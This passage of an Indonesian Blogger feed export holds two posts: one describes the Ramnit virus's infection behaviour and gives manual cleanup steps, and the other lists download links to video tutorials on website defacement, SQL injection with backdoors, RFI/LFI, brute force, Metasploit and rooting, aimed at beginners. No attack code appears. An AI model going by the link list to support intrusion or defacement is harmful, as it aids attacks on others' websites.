recycler UFD.&lt;/li&gt;&lt;li&gt;Bila Virus tersebut telah meng-infeksi system komputer , virus  tersebut akan membuat dan menjalankan file svchost.exe yang akan  melakukan berbagai hal: a. membuat file bernama : watermark.exe yang  bertempat di folder : C:\programfiles\mikrosoft\watermark.exe. b.  merubah  registry userinit.exe mejadi menjalankan : watermark.exe ,  sehingga virus tersebut menguasai sistem secara permanen , dengan cara  menginfeksi file berekstensi .exe , . dll dan .html&lt;/li&gt;&lt;li&gt;Jika di properties , UFD akan terlihat banyak terpakai oleh file .cpl dan .exe di folder recycler.&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;&lt;strong&gt;Efeknya:&lt;span id="more-1609"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Virus ramnit akan membuat file program tidak berjalan dengan normal , misalnya: mozilla firefox , winamp dll&lt;/li&gt;&lt;li&gt;kita tidak bisa menghapus file watermark.exe yang ada difolder  c:\programfiles\microsoft\watermark.exe , dikarenakan file tersebut  dikunci oleh file svchost.exe-nya virus ramnit.&lt;/li&gt;&lt;li&gt;bila kita hapus file / folder yang ada didalam folder recycler UFD ,  file .cpl dan .exe akan muncul kembali.. dan terus menulis kembali…&lt;/li&gt;&lt;li&gt;untuk system yangtelah terinfeksi file tertentu.. misalnya : explorer.exe akan digantikan explorermgr.exe&lt;/li&gt;&lt;li&gt;bila kita membersihkan virus ini tidak tuntas ( ada yang belum  dibersihkan ) , Virus ini akan kembali bila kita menjalankan  aplikasi (  misalnya : klik kanan ).&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;&lt;strong&gt;Cara membersihkannya:&lt;/strong&gt;&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Siapkan cleaner Anti Virus ( saya menggunakan NOD32 stand alone ) dengan cara &amp;gt;&lt;a title="Download file yang terakhir" href="http://ftp.isu.edu.tw/realtime.php?dir=/Windows/Edskes/n" target="_blank"&gt;download disini&lt;/a&gt;&amp;lt; dan simpan dalam bentuk file zip / RAR agar file exe tersebut tidak terinfeksi virus.&lt;strong&gt;&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;Simpan file tersebut di UFD atau copy paste di harddisk komputer yang telah terinfeksi.&lt;/li&gt;&lt;li&gt;Gunakan task manager , pilih task / tab processes dan end task semua  file svchost.exe dan juga semua yang bisa di end task ( kecuali : task  managernya )&lt;/li&gt;&lt;li&gt;Open file cleaner NOD32 yang sudah berbentuk zip /RAR , dengan  menggunakan file open di task manager.Rubah pilihan program di open file  menjadi allfiles agar file zip / rar dari NOD32 bisa terlihat.&lt;/li&gt;&lt;li&gt;setelah teropen NOD32 dengan winrar atau aplikasi lainnya.. silakan  dobel klik file nod*.exe setelah next…next dipilihan action , sebelah  kiri pilih Clean dan sebelah kanan pilih delete.Lalu jalankan Scan &amp;amp;  clean&lt;/li&gt;&lt;li&gt;setelah berjalan close / tutup winrar / aplikasi yang dibuat membuka NOD32 zip / RAR.&lt;/li&gt;&lt;li&gt;Silakan diawasi dengan task manager bila ada file svchost.exe keluar  / tampil di processes segera di end task… dan seperti biasa bila ada  tampilan windows yang memperingatkan bahwa komputer akan shutdown dalam  waktu 60 detik / 1 menit…. silakan ketik di menu file open /run :  shutdown -a    yang artinya -a adalah perintah shutdown untuk  membatalkan aksinya…&lt;/li&gt;&lt;li&gt;Peringatan!!!!!   , disaat NOD 32 membersihkan file di komputer anda  , jangan sampai membuka / menjalankan file apapun… karena jangankan  menjalankan file exe , kita klik kanan aja sudah berarti menjalankan  virus / svchost.exe-nya Virus Ramnit.&lt;/li&gt;&lt;li&gt;Ingat… yang perlu kita jaga adalah : mematikan / end task file svchost.exe selama NOD32 membersihkan file di komputer kita…..&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;&lt;strong&gt;Antisipasi Virus RAmnit:&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;Untuk menjaga Virus sejenis ramnit agar tidak kembali meng-infeksi  komputer kita… disini saya sertakan berbagai trik… diantaranya:&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Matikan autorun.inf windows bisa berbagai macam cara : dengan  menggunakan gpedit.msc&amp;gt;&amp;gt;administrative template&amp;gt;&amp;gt;turn off  auto play&amp;gt;&amp;gt;enable&amp;gt;&amp;gt;alldrive , atau menggunakan regedit  silakan baca : &lt;a href="http://mpu4elcom.net/2008/12/20/agar-virus-tidak-masuk-melalui-flash-disk" target="_blank"&gt;agar virus tidak masuk melalui flash disk&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Rubah beberapa ektensi file yang berpotensi digunakan oleh virus  dengan assosiasi file ( misalnya: assoc .vbs=txtfile ) terutama untuk  Virus ramnit adalah ekstensi .cpl&lt;/li&gt;&lt;li&gt;Hapus selalu folder recycler didalam UFD , bila tidak bisa ada kemungkinan komputer kita terinfeksi Virus…&lt;/li&gt;&lt;li&gt;Dan hapus dengan menggunakan mini windows Xp ( hiren BOOt CD ) atau  system berbasis linux , folder recycler dan _restore yang ada di folder  systeminformation&lt;/li&gt;&lt;li&gt;Install Anti virus dengan Update database terbaru… dan usahakan anti  viru tersebut diupdate databasenya.. baik secara online ataupu  offline.. &lt;img src="http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif?m=1304062156g" alt=":)" class="wp-smiley" /&gt; &lt;/li&gt;&lt;/ol&gt; &lt;p&gt;Disini saya sertakan beberapa file buatan saya yang berfungsi untuk mempermudah setting windows…&lt;/p&gt;  &lt;ol&gt;&lt;li&gt;&lt;a title="NOD32 stand alone tanggal 17-4-2011" href="http://www.ziddu.com/download/14653368/nod32_20110417.rar.html" target="_blank"&gt;NOD32 dari:ziddu.com&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;SUMBER : http://mpu4elcom.net/2011/04/19/cara-membersihkan-virus-ramnit-mudah-dan-tuntas/&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-8833230848718146633?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/8833230848718146633/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2011/07/memberantas-virus-ramnit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/8833230848718146633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/8833230848718146633'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2011/07/memberantas-virus-ramnit.html' title='MEMBERANTAS VIRUS RAMNIT'/><author><name>SAIKHUDIN JATI NUGROHO</name><uri>http://www.blogger.com/profile/11717352810662256851</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_MsQe5Z6o5Hs/STNXBbJT0tI/AAAAAAAAABk/8qLwYy1DxyU/S220/DSC00200.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8795353331269225519.post-7158764793812803964</id><published>2011-06-17T10:39:00.002+07:00</published><updated>2011-06-17T10:41:10.745+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKER'/><title type='text'>VIDEO HACKING</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; "&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;strong style="font-size: 11px; line-height: 16px; "&gt;ALL VIDEO HACKING&lt;/strong&gt;&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt; &lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Untuk yg sdah mengenal dunia deface mungkin tutorial ni sangatlah tidak asing lagi...B Tapi bwat yang newbie  mungkin ini sangat bermanfaat....silahkan disedot video'y tutor'y&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Phpmyadmin&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/pz7Ozrjr/phpmyadmin.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Cpanel Hacking&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/G3pXG06c/C_p4nel.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Brute Force&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/NT-NDbjs/tutoraccountBruteForce.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Joomla Reset Password&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/MIecxKVa/joomla_reset_pass.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - RFI Metode + Patch&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/Ov_3yd9W/RFI_Patc.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - LFI (Local file disclosure)&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/jSmkcNrR/L_F_I.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Sqli + Backdoring&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/8mmHwxxW/SQLi_B4CKd0r.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Deface with HTML&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/hkxQik5C/DefacHTML-Injec.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Sqli V.4&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/IBQ-RZU1/S-v4.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Sqli V.5&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/Tutorial_SQL_Injection.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Jumping&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/Agmx67u5/JumP_N4ck0.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Metasploit&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/fx87EhEY/tutor_metas.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Rooting&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/Z7YF5ahj/R00tin9.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Asp Sql inj_TUTOR&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/X60x9df6/asp-sql-inj_TUTOR.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Scemafuzzy&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/FDOJKC3d/Scema.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Backdoring + Inject + Deface&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/QMSTE8zc/_2__BackInjectDef.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Sqli Malingsial Version&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/xfy-al-Q/Malingsial.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Patching Joomla&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/a_GUfnkm/joomla_patch.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Hacking Video Tutorial - Defacing Tutorial&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;4shared.com/file/Hu4IxoNG/Defac-Tutor.html&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;---------------------------------------------------------------------&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 11px; line-height: 16px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;-----------------------------------------------------------------&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;Masukan nama dan alamat email&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8795353331269225519-7158764793812803964?l=blognyajati.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blognyajati.blogspot.com/feeds/7158764793812803964/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://blognyajati.blogspot.com/2011/06/video-hacking.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7158764793812803964'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8795353331269225519/posts/default/7158764793812803964'/><link rel='alternate' type='text/html' href='http://blognyajati.blogspot.com/2011/06/video-hacking.html' title='VIDEO HACKING'/><author><name>SAIKHUDIN JATI 